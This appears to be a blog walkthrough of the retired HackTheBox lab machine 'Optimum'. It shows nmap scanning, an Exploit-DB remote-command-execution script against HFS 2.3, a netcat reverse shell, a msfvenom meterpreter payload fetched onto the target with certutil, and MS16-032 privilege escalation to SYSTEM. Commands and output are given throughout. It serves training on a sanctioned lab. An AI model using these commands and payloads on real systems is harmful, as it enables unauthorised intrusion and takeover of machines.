HackTheBox · Pentesting

Optimum – HackTheBox Walkthrough

This is a retired machine of HackTheBox.

Machine’s difficulty and rating

It’s rated as being quite easy, try it for yourself now! Come back only if you feel stuck 🙂.

Let’s begin!

Table of Contents

Port Scanning

Let’s start checking which ports are open, with the help of nmap:

kali@kali ~/H/Optimum> sudo nmap -p- -T4 -A -oN nmap.results 10.10.10.8

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 13:16 EDT
Nmap scan report for 10.10.10.8
Host is up (0.046s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

I guess there’s not much to say here 😛

Searching for vulnerabilities

When I see a service version, I immediately query searchsploit to find exploits for it. (most often even before googling)

kali@kali ~/H/Optimum> searchsploit HttpFileServer 2.3

Exploits: No Results
Shellcodes: No Results

No luck…

But wait! Sometimes the exploits can have a different naming, for instance, referencing only the initials of the service, let’s try like this:

kali@kali ~/H/Optimum> searchsploit HFS 2.3

HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt

Looks like we have a lot of options here.

Note though that if you google for an exploit, you can easily find one that is already built in Metasploit, however let’s go with the slightly harder route.

Getting a shell

I chose the second-last exploit, because it’s Python so we can run it.

To copy the exploit, type this:

kali@kali ~/H/Optimum> searchsploit -m windows/remote/39161.py
Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
URL: https://www.exploit-db.com/exploits/39161
Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /home/kali/HackTheBox/Optimum/39161.py

Now, after reading its source, you can see that it requires you to change your ip and port:

Gedit 39161.py

After changing it, remember to start a netcat before running the exploit.

kali@kali ~/H/Optimum> nc -vlp 9090
listening on [any] 9090 …

Oh and I hope you have read the exploit’s description, because it asks you to host a webserver to serve netcat!

kali@kali ~/H/O/http> wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

--2020-08-15 13:54:36-- https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
Resolving eternallybored.org (eternallybored.org)… 84.255.206.8, 2a01:260:4094:1:42:42:42:42
Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 109604 (107K) [application/zip]
Saving to: ‘netcat-win32-1.11.zip’

netcat-win32-1.11.zip 100%[=======================================================>] 107.04K 585KB/s in 0.2s

2020-08-15 13:54:37 (585 KB/s) - ‘netcat-win32-1.11.zip’ saved [109604/109604]

kali@kali ~/H/O/http> unzip netcat-win32-1.11.zip

Archive: netcat-win32-1.11.zip
inflating: netcat-1.11/doexec.c
inflating: netcat-1.11/generic.h
inflating: netcat-1.11/getopt.c
inflating: netcat-1.11/getopt.h
inflating: netcat-1.11/hobbit.txt
inflating: netcat-1.11/license.txt
inflating: netcat-1.11/Makefile
inflating: netcat-1.11/nc.exe
inflating: netcat-1.11/nc64.exe
inflating: netcat-1.11/netcat.c
inflating: netcat-1.11/readme.txt
kali@kali ~/H/O/http> cd netcat-1.11/

Now it’s time to serve it to the exploit, for that we’ll use the http.server module of Python3:

kali@kali ~/H/O/h/netcat-1.11> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

Note: If you don’t modify the exploit, you must use port 80, and for that you need to sudo

Time to (finally) run the script!

kali@kali ~/H/Optimum> python 39161.py 10.10.10.8 80

(assuming you have read the usage part of the script :P)

Then in the netcat:

kali@kali ~/H/Optimum [1]> nc -vlp 9090
listening on [any] 9090 …
10.10.10.8: inverse host lookup failed: Unknown host
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49171
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
C:\Users\kostas\Desktop>

Upgrading shell to meterpreter

In Windows machines, I always like to upgrade the shell to a meterpreter (it’s way easier to priv esc that way).

Let’s try it, but first, let’s check what architecture the windows is in:

C:\Users\kostas\Desktop>systeminfo
systeminfo

Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
...
System Model: VMware Virtual Platform
System Type: x64-based PC

It’s x64, now we need to generate a x64 meterpreter payload that will get us the reverse meterpreter shell:

kali@kali ~/H/O/http> msfvenom -f exe -o payload.exe -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.25 LPORT=4040
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201283 bytes
Final size of exe file: 207872 bytes
Saved as: payload.exe
kali@kali ~/H/O/http>

That command will generate an exe file, of the payload type meterpreter_reverse_tcp for x64 Windows with my IP and an arbitrary Port

The second step is setting up the handler/listener for it:

kali@kali ~/H/Optimum> msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

It gave us a default payload, let’s specify the one we want.

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp

Now the LHOST and LPORT (ours, the same ones we specified in msfvenom):

msf5 exploit(multi/handler) > set LHOST 10.10.14.30
LHOST => 10.10.14.30
msf5 exploit(multi/handler) > set LPORT 4040
LPORT => 4040

Then start it.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.30:4040

As for the third step, all that’s left to do is getting it into the target and executing it.

Like we did for the netcat, we’ll now serve the http server for the payload.exe.

kali@kali ~/H/O/http> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

Now on the target (hopefully your shell hasn’t died yet), we’ll use certutil.exe to download the payload from our machine.

C:\Users\kostas\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
**** Online ****
000000 …
032c00
CertUtil: -URLCache command completed successfully.

It downloaded successfully, we can check that also on our python output:

kali@kali ~/H/O/http> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.10.8 - - [15/Aug/2020 18:45:01] "GET /payload.exe HTTP/1.1" 200 -
10.10.10.8 - - [15/Aug/2020 18:45:01] "GET /payload.exe HTTP/1.1" 200 -

Let’s execute it!

C:\Users\kostas\Desktop>.\payload.exe
.\payload.exe

Your msfconsole should now light up.

[] Started reverse TCP handler on 10.10.14.30:4040 [] Meterpreter session 1 opened (10.10.14.30:4040 -> 10.10.10.8:49186) at 2020-08-15 18:47:26 -0400

meterpreter > getuid
Server username: OPTIMUM\kostas

Privilege escalation

Time to get to the root of it.

It’s always a good idea to try the script kiddie’s friend:

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Well, it didn’t hurt to try.

Let’s search for priv esc exploits for this Windows version (that we had noticed before).

Google is always the friend

The title is

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Local Privilege Escalation (MS16-032) (PowerShell)

We can check that vulnerability ID in metasploit to see if there’s already a module for that.

msf5 exploit(multi/handler) > search MS16-032

...

0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation

And it looks like we’re golden!

Let’s give it a go.

msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.30
LHOST => 10.10.14.30
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5050
LPORT => 5050
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit

[*] Started reverse TCP handler on 10.10.14.30:5050
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\RSKjjO.ps1…
[*] Compressing script contents…
[+] Compressed size: 3592
[*] Executing exploit script…

...

[!] Holy handle leak Batman, we have a SYSTEM shell!!

UPU6QGcJqNltAv0NTRCUVZ3MEdCGZC1P
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.30:5050 -> 10.10.10.8:49187) at 2020-08-15 19:00:17 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\RSKjjO.ps1
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

And we’re done!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s